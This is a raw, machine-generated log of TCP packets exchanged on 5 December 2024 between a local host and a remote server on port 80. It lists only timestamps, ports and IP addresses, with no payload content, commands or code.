                                                                                                                                                        Dec 5, 2024 05:38:28.331296921 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.331340075 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.339606047 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.339670897 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.339713097 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.452454090 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.452532053 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.452599049 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.454957962 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.455055952 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.455219030 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.459990025 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.460114956 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.460160017 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.464915037 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.465035915 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.465079069 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.469891071 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.470024109 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.470066071 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.474916935 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.475052118 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.475096941 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.479671955 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.479796886 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.479840994 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.484477997 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.484601021 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.484643936 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.489342928 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.489475012 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.489516973 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.494132042 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.494239092 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.494290113 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.498900890 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.499011040 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.499053955 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.503679991 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.503781080 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.503822088 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.508526087 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.508641958 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.508685112 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.513317108 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.513431072 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.513478994 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.518142939 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.518229961 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.518280983 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.522949934 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.523039103 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.523081064 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.527759075 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.527863026 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.527904034 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.532537937 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.532639027 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.532680988 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.537319899 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.582273960 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.644584894 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.644613981 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.644679070 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.645751953 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.645855904 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.645899057 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.649734020 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.649857044 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.649903059 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.653740883 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.653850079 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.653892994 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.657752037 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.657871008 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.657916069 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.661649942 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.661756992 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.661799908 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.665405035 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.665513039 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.665553093 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.669123888 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.669236898 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.669275999 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.672892094 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.672998905 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.673039913 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.676615000 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.676729918 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.676772118 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.680397034 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.680504084 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.680546045 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.684144020 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.684272051 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.684325933 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.687896013 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.687988043 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.688028097 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.691637993 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.691751957 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.691797018 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.695435047 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.695544004 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.695590019 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.699167967 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.699290991 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.699337959 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.702896118 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.703016996 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.703061104 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.706695080 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.706779003 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.706824064 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.710426092 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.710520983 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.710567951 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.714188099 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.714364052 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.714410067 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.717910051 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.718019009 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.718064070 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.721698046 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.721770048 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.721817017 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.725409985 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.725517988 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.725560904 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.729172945 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.729285955 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.729326963 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.732923031 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.733006954 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.733048916 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.736655951 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.736769915 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.736813068 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.740422964 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.740505934 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.741662025 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.744177103 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.744266033 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.744313002 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.747925043 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.748045921 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.748090982 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.751693010 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.751786947 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.751831055 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.755398035 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.755513906 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.755569935 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.759125948 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.801038980 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.837315083 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.837435961 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.837491035 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.838229895 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.838309050 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.838354111 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.841340065 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.841381073 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.841424942 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.843703985 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.843863010 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.843909025 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.846820116 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.846923113 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.846966982 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.849802971 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.849941969 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.849984884 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.852754116 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.852840900 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.852883101 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.855606079 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.855720043 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.855763912 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.858397007 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.858519077 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.858568907 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.861166000 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.861237049 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.861278057 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.864048004 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.864149094 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.864188910 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.866586924 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.866684914 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.866750002 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.869254112 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.869348049 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.869390965 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.871877909 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.871980906 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.872025013 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.874445915 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.874547958 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.874597073 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.876974106 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.877111912 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.877161980 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.879497051 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.879679918 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.879724979 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.882031918 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.882112026 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.882157087 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.884481907 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.884545088 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.884589911 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.886948109 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.887032032 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.887075901 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.889364004 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.889480114 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.889527082 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.891850948 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.891952991 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.891997099 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.894319057 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.894488096 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.894531012 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.896770000 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.896887064 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.896945953 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.899230003 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.899341106 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.899414062 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.901700974 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.901803970 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.901855946 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.904169083 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.904257059 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.904294968 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.906625032 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.906723976 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.906761885 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.909075975 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.909203053 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.909245968 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.911565065 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.911638021 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.911690950 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.914001942 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.914119005 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.914166927 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.916488886 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.916587114 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.916624069 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.918947935 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.919064999 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.919111013 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.921390057 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.921494961 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.921556950 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.923857927 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.923964024 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.924007893 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.926353931 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.926434040 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.926501036 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.928782940 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.928881884 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.928931952 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.931253910 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.931343079 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.931392908 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.933733940 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.933815002 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.933860064 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.936167955 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.936306000 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.936352968 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.938623905 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.938740015 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.938782930 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.941082001 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.941200972 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.941242933 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.943551064 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.943597078 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.943641901 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.946041107 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.946151972 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.946199894 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.948549032 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.948611975 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.948723078 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.950942993 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.951066971 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.951105118 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.953391075 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.953493118 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.953536034 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.955876112 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.955998898 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.956101894 CET4975980192.168.2.6172.245.123.3
